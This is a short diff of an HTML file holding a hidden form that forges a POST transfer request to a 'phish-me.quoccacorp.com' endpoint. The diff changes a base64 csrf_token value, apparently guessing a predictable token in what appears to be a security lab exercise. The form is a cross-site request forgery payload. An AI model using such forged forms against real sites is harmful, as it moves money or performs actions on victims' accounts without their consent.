--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <html>
 <body>
     <form action="https://phish-me.quoccacorp.com/api/transfer" method="POST" id="csrf_form">
-        <input type="hidden" name="csrf_token" value="MjIzNg==">
+        <input type="hidden" name="csrf_token" value="MjIzOA==">
         <input type="hidden" name="username" value="z5364832">
         <input type="hidden" name="amount" value="100">
     </form>
